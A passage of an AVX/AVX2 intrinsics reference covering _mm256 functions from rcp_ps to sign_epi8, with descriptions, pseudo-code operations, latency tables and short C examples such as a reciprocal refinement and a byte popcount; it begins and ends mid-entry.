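    return _mm256_permutevar8x32_ps(v, idx);
}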
vrcpps
__m256 _mm256_rcp_ps (__m256 a)

Synopsis

__m256 _mm256_rcp_ps (__m256 a)
#include «immintrin.h»
Instruction: vrcpps ymm, ymm
CPUID Flags: AVX

Description

Compute the approximate reciprocal of packed single-precision (32-bit) floating-point elements in a, and store the results in dst. The maximum relative error for this approximation is less than 1.5*2^-12.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := APPROXIMATE(1.0/a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 7 1
Ivy Bridge 7 1
Sandy Bridge 7 1
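
Since vrcpps only gives about 12 bits of precision, a common pattern is one Newton-Raphson refinement step, x1 = x0*(2 - a*x0), roughly doubling the accurate bits. A minimal sketch assuming AVX; this is still not a substitute for vdivps when full precision is required.

#include <immintrin.h>

__m256 fast_recip(__m256 a)
{
    __m256 x0  = _mm256_rcp_ps(a);                     /* ~1/a, max relative error < 1.5*2^-12 */
    __m256 two = _mm256_set1_ps(2.0f);
    return _mm256_mul_ps(x0, _mm256_sub_ps(two, _mm256_mul_ps(a, x0)));
}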
vroundpd
__m256d _mm256_round_pd (__m256d a, int rounding)

Synopsis

__m256d _mm256_round_pd (__m256d a, int rounding)
#include «immintrin.h»
Instruction: vroundpd ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed double-precision (64-bit) floating-point elements in a using the rounding parameter, and store the results as packed double-precision floating-point elements in dst.
Rounding is done according to the rounding parameter, which can be one of:

(_MM_FROUND_TO_NEAREST_INT |_MM_FROUND_NO_EXC) // round to nearest, and suppress exceptions (_MM_FROUND_TO_NEG_INF |_MM_FROUND_NO_EXC) // round down, and suppress exceptions (_MM_FROUND_TO_POS_INF |_MM_FROUND_NO_EXC) // round up, and suppress exceptions (_MM_FROUND_TO_ZERO |_MM_FROUND_NO_EXC) // truncate, and suppress exceptions _MM_FROUND_CUR_DIRECTION // use MXCSR.RC; see _MM_SET_ROUNDING_MODE

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := ROUND(a[i+63:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
vroundps
__m256 _mm256_round_ps (__m256 a, int rounding)

Synopsis

__m256 _mm256_round_ps (__m256 a, int rounding)
#include «immintrin.h»
Instruction: vroundps ymm, ymm, imm
CPUID Flags: AVX

Description

Round the packed single-precision (32-bit) floating-point elements in a using the rounding parameter, and store the results as packed single-precision floating-point elements in dst.
Rounding is done according to the rounding parameter, which can be one of:

(_MM_FROUND_TO_NEAREST_INT |_MM_FROUND_NO_EXC) // round to nearest, and suppress exceptions (_MM_FROUND_TO_NEG_INF |_MM_FROUND_NO_EXC) // round down, and suppress exceptions (_MM_FROUND_TO_POS_INF |_MM_FROUND_NO_EXC) // round up, and suppress exceptions (_MM_FROUND_TO_ZERO |_MM_FROUND_NO_EXC) // truncate, and suppress exceptions _MM_FROUND_CUR_DIRECTION // use MXCSR.RC; see _MM_SET_ROUNDING_MODE

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := ROUND(a[i+31:i]) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 6 1
Ivy Bridge 3 1
Sandy Bridge 3 1
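
A minimal sketch of the rounding selectors in practice: vector floor and ceiling via vroundps, with floating-point exceptions suppressed. Assumes AVX.

#include <immintrin.h>

__m256 floor8(__m256 v)
{
    return _mm256_round_ps(v, _MM_FROUND_TO_NEG_INF | _MM_FROUND_NO_EXC);
}

__m256 ceil8(__m256 v)
{
    return _mm256_round_ps(v, _MM_FROUND_TO_POS_INF | _MM_FROUND_NO_EXC);
}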
vrsqrtps
__m256 _mm256_rsqrt_ps (__m256 a)

Synopsis

__m256 _mm256_rsqrt_ps (__m256 a)
#include «immintrin.h»
Instruction: vrsqrtps ymm, ymm
CPUID Flags: AVX

Description

Compute the approximate reciprocal square root of packed single-precision (32-bit) floating-point elements in a, and store the results in dst. The maximum relative error for this approximation is less than 1.5*2^-12.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := APPROXIMATE(1.0 / SQRT(a[i+31:i])) ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 7 1
Ivy Bridge 7 1
Sandy Bridge 7 1
vpsadbw
__m256i _mm256_sad_epu8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sad_epu8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsadbw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Compute the absolute differences of packed unsigned 8-bit integers in a and b, then horizontally sum each consecutive 8 differences to produce four unsigned 16-bit integers, and pack these unsigned 16-bit integers in the low 16 bits of 64-bit elements in dst.

Operation

FOR j := 0 to 31 i := j*8 tmp[i+7:i] := ABS(a[i+7:i] - b[i+7:i]) ENDFOR FOR j := 0 to 3 i := j*64 dst[i+15:i] := tmp[i+7:i] + tmp[i+15:i+8] + tmp[i+23:i+16] + tmp[i+31:i+24] + tmp[i+39:i+32] + tmp[i+47:i+40] + tmp[i+55:i+48] + tmp[i+63:i+56] dst[i+63:i+16] := 0 ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 5 1
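
A minimal sketch: total absolute difference of two 32-byte blocks (a common building block for image/block matching). vpsadbw leaves four partial sums in the low 16 bits of each 64-bit element, which are then added on the scalar side. Assumes AVX2; names are illustrative.

#include <immintrin.h>
#include <stdint.h>

uint32_t sad32(const uint8_t *a, const uint8_t *b)
{
    __m256i va  = _mm256_loadu_si256((const __m256i *)a);
    __m256i vb  = _mm256_loadu_si256((const __m256i *)b);
    __m256i sad = _mm256_sad_epu8(va, vb);             /* four 16-bit partial sums in 64-bit lanes */
    return (uint32_t)(_mm256_extract_epi64(sad, 0) +
                      _mm256_extract_epi64(sad, 1) +
                      _mm256_extract_epi64(sad, 2) +
                      _mm256_extract_epi64(sad, 3));
}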
__m256i _mm256_set_epi16 (short e15, short e14, short e13, short e12, short e11, short e10, short e9, short e8, short e7, short e6, short e5, short e4, short e3, short e2, short e1, short e0)

Synopsis

__m256i _mm256_set_epi16 (short e15, short e14, short e13, short e12, short e11, short e10, short e9, short e8, short e7, short e6, short e5, short e4, short e3, short e2, short e1, short e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 16-bit integers in dst with the supplied values.

Operation

dst[15:0] := e0 dst[31:16] := e1 dst[47:32] := e2 dst[63:48] := e3 dst[79:64] := e4 dst[95:80] := e5 dst[111:96] := e6 dst[127:112] := e7 dst[143:128] := e8 dst[159:144] := e9 dst[175:160] := e10 dst[191:176] := e11 dst[207:192] := e12 dst[223:208] := e13 dst[239:224] := e14 dst[255:240] := e15 dst[MAX:256] := 0
__m256i _mm256_set_epi32 (int e7, int e6, int e5, int e4, int e3, int e2, int e1, int e0)

Synopsis

__m256i _mm256_set_epi32 (int e7, int e6, int e5, int e4, int e3, int e2, int e1, int e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 32-bit integers in dst with the supplied values.

Operation

dst[31:0] := e0 dst[63:32] := e1 dst[95:64] := e2 dst[127:96] := e3 dst[159:128] := e4 dst[191:160] := e5 dst[223:192] := e6 dst[255:224] := e7 dst[MAX:256] := 0
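
A minimal sketch of the argument ordering: _mm256_set_epi32 takes e7..e0 with e0 landing in the lowest lane, so storing the vector to memory produces the values in reverse of the argument order; _mm256_setr_epi32 (below) takes them in memory order. Assumes AVX.

#include <immintrin.h>
#include <stdint.h>

void demo_set_order(int32_t out[8])
{
    __m256i v = _mm256_set_epi32(7, 6, 5, 4, 3, 2, 1, 0);  /* e7=7 ... e0=0 */
    _mm256_storeu_si256((__m256i *)out, v);                /* out = {0,1,2,3,4,5,6,7} */
}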
__m256i _mm256_set_epi64x (__int64 e3, __int64 e2, __int64 e1, __int64 e0)

Synopsis

__m256i _mm256_set_epi64x (__int64 e3, __int64 e2, __int64 e1, __int64 e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 64-bit integers in dst with the supplied values.

Operation

dst[63:0] := e0 dst[127:64] := e1 dst[191:128] := e2 dst[255:192] := e3 dst[MAX:256] := 0
__m256i _mm256_set_epi8 (char e31, char e30, char e29, char e28, char e27, char e26, char e25, char e24, char e23, char e22, char e21, char e20, char e19, char e18, char e17, char e16, char e15, char e14, char e13, char e12, char e11, char e10, char e9, char e8, char e7, char e6, char e5, char e4, char e3, char e2, char e1, char e0)

Synopsis

__m256i _mm256_set_epi8 (char e31, char e30, char e29, char e28, char e27, char e26, char e25, char e24, char e23, char e22, char e21, char e20, char e19, char e18, char e17, char e16, char e15, char e14, char e13, char e12, char e11, char e10, char e9, char e8, char e7, char e6, char e5, char e4, char e3, char e2, char e1, char e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 8-bit integers in dst with the supplied values.

Operation

dst[7:0] := e0 dst[15:8] := e1 dst[23:16] := e2 dst[31:24] := e3 dst[39:32] := e4 dst[47:40] := e5 dst[55:48] := e6 dst[63:56] := e7 dst[71:64] := e8 dst[79:72] := e9 dst[87:80] := e10 dst[95:88] := e11 dst[103:96] := e12 dst[111:104] := e13 dst[119:112] := e14 dst[127:120] := e15 dst[135:128] := e16 dst[143:136] := e17 dst[151:144] := e18 dst[159:152] := e19 dst[167:160] := e20 dst[175:168] := e21 dst[183:176] := e22 dst[191:184] := e23 dst[199:192] := e24 dst[207:200] := e25 dst[215:208] := e26 dst[223:216] := e27 dst[231:224] := e28 dst[239:232] := e29 dst[247:240] := e30 dst[255:248] := e31 dst[MAX:256] := 0
vinsertf128
__m256 _mm256_set_m128 (__m128 hi, __m128 lo)

Synopsis

__m256 _mm256_set_m128 (__m128 hi, __m128 lo)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256 vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256d _mm256_set_m128d (__m128d hi, __m128d lo)

Synopsis

__m256d _mm256_set_m128d (__m128d hi, __m128d lo)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256d vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256i _mm256_set_m128i (__m128i hi, __m128i lo)

Synopsis

__m256i _mm256_set_m128i (__m128i hi, __m128i lo)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256i vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
__m256d _mm256_set_pd (double e3, double e2, double e1, double e0)

Synopsis

__m256d _mm256_set_pd (double e3, double e2, double e1, double e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed double-precision (64-bit) floating-point elements in dst with the supplied values.

Operation

dst[63:0] := e0 dst[127:64] := e1 dst[191:128] := e2 dst[255:192] := e3 dst[MAX:256] := 0
__m256 _mm256_set_ps (float e7, float e6, float e5, float e4, float e3, float e2, float e1, float e0)

Synopsis

__m256 _mm256_set_ps (float e7, float e6, float e5, float e4, float e3, float e2, float e1, float e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed single-precision (32-bit) floating-point elements in dst with the supplied values.

Operation

dst[31:0] := e0 dst[63:32] := e1 dst[95:64] := e2 dst[127:96] := e3 dst[159:128] := e4 dst[191:160] := e5 dst[223:192] := e6 dst[255:224] := e7 dst[MAX:256] := 0
__m256i _mm256_set1_epi16 (short a)

Synopsis

__m256i _mm256_set1_epi16 (short a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast 16-bit integer a to all elements of dst. This intrinsic may generate the vpbroadcastw instruction.

Operation

FOR j := 0 to 15 i := j*16 dst[i+15:i] := a[15:0] ENDFOR dst[MAX:256] := 0
__m256i _mm256_set1_epi32 (int a)

Synopsis

__m256i _mm256_set1_epi32 (int a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast 32-bit integer a to all elements of dst. This intrinsic may generate the vpbroadcastd instruction.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:256] := 0
__m256i _mm256_set1_epi64x (long long a)

Synopsis

__m256i _mm256_set1_epi64x (long long a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast 64-bit integer a to all elements of dst. This intrinsic may generate the vpbroadcastq instruction.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:256] := 0
__m256i _mm256_set1_epi8 (char a)

Synopsis

__m256i _mm256_set1_epi8 (char a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast 8-bit integer a to all elements of dst. This intrinsic may generate the vpbroadcastb instruction.

Operation

FOR j := 0 to 31 i := j*8 dst[i+7:i] := a[7:0] ENDFOR dst[MAX:256] := 0
__m256d _mm256_set1_pd (double a)

Synopsis

__m256d _mm256_set1_pd (double a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast double-precision (64-bit) floating-point value a to all elements of dst.

Operation

FOR j := 0 to 3 i := j*64 dst[i+63:i] := a[63:0] ENDFOR dst[MAX:256] := 0
__m256 _mm256_set1_ps (float a)

Synopsis

__m256 _mm256_set1_ps (float a)
#include «immintrin.h»
CPUID Flags: AVX

Description

Broadcast single-precision (32-bit) floating-point value a to all elements of dst.

Operation

FOR j := 0 to 7 i := j*32 dst[i+31:i] := a[31:0] ENDFOR dst[MAX:256] := 0
__m256i _mm256_setr_epi16 (short e15, short e14, short e13, short e12, short e11, short e10, short e9, short e8, short e7, short e6, short e5, short e4, short e3, short e2, short e1, short e0)

Synopsis

__m256i _mm256_setr_epi16 (short e15, short e14, short e13, short e12, short e11, short e10, short e9, short e8, short e7, short e6, short e5, short e4, short e3, short e2, short e1, short e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 16-bit integers in dst with the supplied values in reverse order.

Operation

dst[15:0] := e15 dst[31:16] := e14 dst[47:32] := e13 dst[63:48] := e12 dst[79:64] := e11 dst[95:80] := e10 dst[111:96] := e9 dst[127:112] := e8 dst[143:128] := e7 dst[159:144] := e6 dst[175:160] := e5 dst[191:176] := e4 dst[207:192] := e3 dst[223:208] := e2 dst[239:224] := e1 dst[255:240] := e0 dst[MAX:256] := 0
__m256i _mm256_setr_epi32 (int e7, int e6, int e5, int e4, int e3, int e2, int e1, int e0)

Synopsis

__m256i _mm256_setr_epi32 (int e7, int e6, int e5, int e4, int e3, int e2, int e1, int e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 32-bit integers in dst with the supplied values in reverse order.

Operation

dst[31:0] := e7 dst[63:32] := e6 dst[95:64] := e5 dst[127:96] := e4 dst[159:128] := e3 dst[191:160] := e2 dst[223:192] := e1 dst[255:224] := e0 dst[MAX:256] := 0
__m256i _mm256_setr_epi64x (__int64 e3, __int64 e2, __int64 e1, __int64 e0)

Synopsis

__m256i _mm256_setr_epi64x (__int64 e3, __int64 e2, __int64 e1, __int64 e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 64-bit integers in dst with the supplied values in reverse order.

Operation

dst[63:0] := e3 dst[127:64] := e2 dst[191:128] := e1 dst[255:192] := e0 dst[MAX:256] := 0
__m256i _mm256_setr_epi8 (char e31, char e30, char e29, char e28, char e27, char e26, char e25, char e24, char e23, char e22, char e21, char e20, char e19, char e18, char e17, char e16, char e15, char e14, char e13, char e12, char e11, char e10, char e9, char e8, char e7, char e6, char e5, char e4, char e3, char e2, char e1, char e0)

Synopsis

__m256i _mm256_setr_epi8 (char e31, char e30, char e29, char e28, char e27, char e26, char e25, char e24, char e23, char e22, char e21, char e20, char e19, char e18, char e17, char e16, char e15, char e14, char e13, char e12, char e11, char e10, char e9, char e8, char e7, char e6, char e5, char e4, char e3, char e2, char e1, char e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed 8-bit integers in dst with the supplied values in reverse order.

Operation

dst[7:0] := e31 dst[15:8] := e30 dst[23:16] := e29 dst[31:24] := e28 dst[39:32] := e27 dst[47:40] := e26 dst[55:48] := e25 dst[63:56] := e24 dst[71:64] := e23 dst[79:72] := e22 dst[87:80] := e21 dst[95:88] := e20 dst[103:96] := e19 dst[111:104] := e18 dst[119:112] := e17 dst[127:120] := e16 dst[135:128] := e15 dst[143:136] := e14 dst[151:144] := e13 dst[159:152] := e12 dst[167:160] := e11 dst[175:168] := e10 dst[183:176] := e9 dst[191:184] := e8 dst[199:192] := e7 dst[207:200] := e6 dst[215:208] := e5 dst[223:216] := e4 dst[231:224] := e3 dst[239:232] := e2 dst[247:240] := e1 dst[255:248] := e0 dst[MAX:256] := 0
vinsertf128
__m256 _mm256_setr_m128 (__m128 lo, __m128 hi)

Synopsis

__m256 _mm256_setr_m128 (__m128 lo, __m128 hi)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256 vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256d _mm256_setr_m128d (__m128d lo, __m128d hi)

Synopsis

__m256d _mm256_setr_m128d (__m128d lo, __m128d hi)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256d vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
vinsertf128
__m256i _mm256_setr_m128i (__m128i lo, __m128i hi)

Synopsis

__m256i _mm256_setr_m128i (__m128i lo, __m128i hi)
#include «immintrin.h»
Instruction: vinsertf128 ymm, ymm, xmm, imm
CPUID Flags: AVX

Description

Set packed __m256i vector dst with the supplied values.

Operation

dst[127:0] := lo[127:0] dst[255:128] := hi[127:0] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 3
Ivy Bridge 1
Sandy Bridge 1
__m256d _mm256_setr_pd (double e3, double e2, double e1, double e0)

Synopsis

__m256d _mm256_setr_pd (double e3, double e2, double e1, double e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed double-precision (64-bit) floating-point elements in dst with the supplied values in reverse order.

Operation

dst[63:0] := e3 dst[127:64] := e2 dst[191:128] := e1 dst[255:192] := e0 dst[MAX:256] := 0
__m256 _mm256_setr_ps (float e7, float e6, float e5, float e4, float e3, float e2, float e1, float e0)

Synopsis

__m256 _mm256_setr_ps (float e7, float e6, float e5, float e4, float e3, float e2, float e1, float e0)
#include «immintrin.h»
CPUID Flags: AVX

Description

Set packed single-precision (32-bit) floating-point elements in dst with the supplied values in reverse order.

Operation

dst[31:0] := e7 dst[63:32] := e6 dst[95:64] := e5 dst[127:96] := e4 dst[159:128] := e3 dst[191:160] := e2 dst[223:192] := e1 dst[255:224] := e0 dst[MAX:256] := 0
vxorpd
__m256d _mm256_setzero_pd (void)

Synopsis

__m256d _mm256_setzero_pd (void)
#include «immintrin.h»
Instruction: vxorpd ymm, ymm, ymm
CPUID Flags: AVX

Description

Return vector of type __m256d with all elements set to zero.

Operation

dst[MAX:0] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vxorps
__m256 _mm256_setzero_ps (void)

Synopsis

__m256 _mm256_setzero_ps (void)
#include «immintrin.h»
Instruction: vxorps ymm, ymm, ymm
CPUID Flags: AVX

Description

Return vector of type __m256 with all elements set to zero.

Operation

dst[MAX:0] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpxor
__m256i _mm256_setzero_si256 (void)

Synopsis

__m256i _mm256_setzero_si256 (void)
#include «immintrin.h»
Instruction: vpxor ymm, ymm, ymm
CPUID Flags: AVX

Description

Return vector of type __m256i with all elements set to zero.

Operation

dst[MAX:0] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpshufd
__m256i _mm256_shuffle_epi32 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_shuffle_epi32 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpshufd ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 32-bit integers in a within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], imm8[1:0]) dst[63:32] := SELECT4(a[127:0], imm8[3:2]) dst[95:64] := SELECT4(a[127:0], imm8[5:4]) dst[127:96] := SELECT4(a[127:0], imm8[7:6]) dst[159:128] := SELECT4(a[255:128], imm8[1:0]) dst[191:160] := SELECT4(a[255:128], imm8[3:2]) dst[223:192] := SELECT4(a[255:128], imm8[5:4]) dst[255:224] := SELECT4(a[255:128], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpshufb
__m256i _mm256_shuffle_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_shuffle_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpshufb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Shuffle 8-bit integers in a within 128-bit lanes according to shuffle control mask in the corresponding 8-bit element of b, and store the results in dst.

Operation

FOR j := 0 to 15 i := j*8 IF b[i+7] == 1 dst[i+7:i] := 0 ELSE index[3:0] := b[i+3:i] dst[i+7:i] := a[index*8+7:index*8] FI IF b[128+i+7] == 1 dst[128+i+7:128+i] := 0 ELSE index[3:0] := b[128+i+3:128+i] dst[128+i+7:128+i] := a[128+index*8+7:128+index*8] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
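
A classic use of vpshufb is as a 16-entry table lookup on nibbles. The sketch below computes a per-byte population count; the lookup table is replicated in both 128-bit lanes because vpshufb only shuffles within lanes. Assumes AVX2; the function name is illustrative.

#include <immintrin.h>

__m256i popcount_bytes(__m256i v)
{
    const __m256i lut  = _mm256_setr_epi8(
        0,1,1,2, 1,2,2,3, 1,2,2,3, 2,3,3,4,    /* popcounts of nibbles 0..15, low lane  */
        0,1,1,2, 1,2,2,3, 1,2,2,3, 2,3,3,4);   /* same table, high lane */
    const __m256i mask = _mm256_set1_epi8(0x0F);
    __m256i lo = _mm256_and_si256(v, mask);                        /* low nibble of each byte  */
    __m256i hi = _mm256_and_si256(_mm256_srli_epi16(v, 4), mask);  /* high nibble of each byte */
    return _mm256_add_epi8(_mm256_shuffle_epi8(lut, lo),
                           _mm256_shuffle_epi8(lut, hi));
}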
vshufpd
__m256d _mm256_shuffle_pd (__m256d a, __m256d b, const int imm8)

Synopsis

__m256d _mm256_shuffle_pd (__m256d a, __m256d b, const int imm8)
#include «immintrin.h»
Instruction: vshufpd ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle double-precision (64-bit) floating-point elements within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

dst[63:0] := (imm8[0] == 0) ? a[63:0] : a[127:64] dst[127:64] := (imm8[1] == 0) ? b[63:0] : b[127:64] dst[191:128] := (imm8[2] == 0) ? a[191:128] : a[255:192] dst[255:192] := (imm8[3] == 0) ? b[191:128] : b[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vshufps
__m256 _mm256_shuffle_ps (__m256 a, __m256 b, const int imm8)

Synopsis

__m256 _mm256_shuffle_ps (__m256 a, __m256 b, const int imm8)
#include «immintrin.h»
Instruction: vshufps ymm, ymm, ymm, imm
CPUID Flags: AVX

Description

Shuffle single-precision (32-bit) floating-point elements in a within 128-bit lanes using the control in imm8, and store the results in dst.

Operation

SELECT4(src, control){ CASE(control[1:0]) 0: tmp[31:0] := src[31:0] 1: tmp[31:0] := src[63:32] 2: tmp[31:0] := src[95:64] 3: tmp[31:0] := src[127:96] ESAC RETURN tmp[31:0] } dst[31:0] := SELECT4(a[127:0], imm8[1:0]) dst[63:32] := SELECT4(a[127:0], imm8[3:2]) dst[95:64] := SELECT4(b[127:0], imm8[5:4]) dst[127:96] := SELECT4(b[127:0], imm8[7:6]) dst[159:128] := SELECT4(a[255:128], imm8[1:0]) dst[191:160] := SELECT4(a[255:128], imm8[3:2]) dst[223:192] := SELECT4(b[255:128], imm8[5:4]) dst[255:224] := SELECT4(b[255:128], imm8[7:6]) dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
Ivy Bridge 1 1
Sandy Bridge 1 1
vpshufhw
__m256i _mm256_shufflehi_epi16 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_shufflehi_epi16 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpshufhw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 16-bit integers in the high 64 bits of 128-bit lanes of a using the control in imm8. Store the results in the high 64 bits of 128-bit lanes of dst, with the low 64 bits of 128-bit lanes being copied from a to dst.

Operation

dst[63:0] := a[63:0] dst[79:64] := (a >> (imm8[1:0] * 16))[79:64] dst[95:80] := (a >> (imm8[3:2] * 16))[79:64] dst[111:96] := (a >> (imm8[5:4] * 16))[79:64] dst[127:112] := (a >> (imm8[7:6] * 16))[79:64] dst[191:128] := a[191:128] dst[207:192] := (a >> (imm8[1:0] * 16))[207:192] dst[223:208] := (a >> (imm8[3:2] * 16))[207:192] dst[239:224] := (a >> (imm8[5:4] * 16))[207:192] dst[255:240] := (a >> (imm8[7:6] * 16))[207:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpshuflw
__m256i _mm256_shufflelo_epi16 (__m256i a, const int imm8)

Synopsis

__m256i _mm256_shufflelo_epi16 (__m256i a, const int imm8)
#include «immintrin.h»
Instruction: vpshuflw ymm, ymm, imm
CPUID Flags: AVX2

Description

Shuffle 16-bit integers in the low 64 bits of 128-bit lanes of a using the control in imm8. Store the results in the low 64 bits of 128-bit lanes of dst, with the high 64 bits of 128-bit lanes being copied from a to dst.

Operation

dst[15:0] := (a >> (imm8[1:0] * 16))[15:0] dst[31:16] := (a >> (imm8[3:2] * 16))[15:0] dst[47:32] := (a >> (imm8[5:4] * 16))[15:0] dst[63:48] := (a >> (imm8[7:6] * 16))[15:0] dst[127:64] := a[127:64] dst[143:128] := (a >> (imm8[1:0] * 16))[143:128] dst[159:144] := (a >> (imm8[3:2] * 16))[143:128] dst[175:160] := (a >> (imm8[5:4] * 16))[143:128] dst[191:176] := (a >> (imm8[7:6] * 16))[143:128] dst[255:192] := a[255:192] dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 1
vpsignw
__m256i _mm256_sign_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sign_epi16 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsignw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Negate packed 16-bit integers in a when the corresponding signed 16-bit integer in b is negative, and store the results in dst. Elements in dst are zeroed out when the corresponding element in b is zero.

Operation

FOR j := 0 to 15 i := j*16 IF b[i+15:i] < 0 dst[i+15:i] := NEG(a[i+15:i]) ELSE IF b[i+15:i] = 0 dst[i+15:i] := 0 ELSE dst[i+15:i] := a[i+15:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpsignd
__m256i _mm256_sign_epi32 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sign_epi32 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsignd ymm, ymm, ymm
CPUID Flags: AVX2

Description

Negate packed 32-bit integers in a when the corresponding signed 32-bit integer in b is negative, and store the results in dst. Elements in dst are zeroed out when the corresponding element in b is zero.

Operation

FOR j := 0 to 7 i := j*32 IF b[i+31:i] < 0 dst[i+31:i] := NEG(a[i+31:i]) ELSE IF b[i+31:i] = 0 dst[i+31:i] := 0 ELSE dst[i+31:i] := a[i+31:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
vpsignb
__m256i _mm256_sign_epi8 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_sign_epi8 (__m256i a, __m256i b)
#include «immintrin.h»
Instruction: vpsignb ymm, ymm, ymm
CPUID Flags: AVX2

Description

Negate packed 8-bit integers in a when the corresponding signed 8-bit integer in b is negative, and store the results in dst. Elements in dst are zeroed out when the corresponding element in b is zero.

Operation

FOR j := 0 to 31 i := j*8 IF b[i+7:i] < 0 dst[i+7:i] := NEG(a[i+7:i]) ELSE IF b[i+7:i] = 0 dst[i+7:i] := 0 ELSE dst[i+7:i] := a[i+7:i] FI ENDFOR dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1 0.5
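
A common use of the vpsign family is conditional negation, e.g. applying a precomputed sign vector or taking an absolute value. A minimal sketch (assumes -mavx2); note that _mm256_sign_epi16(a, a) behaves like abs() except that INT16_MIN maps to itself:

#include <immintrin.h>
#include <stdio.h>

int main(void) {
    __m256i a    = _mm256_set1_epi16(-7);
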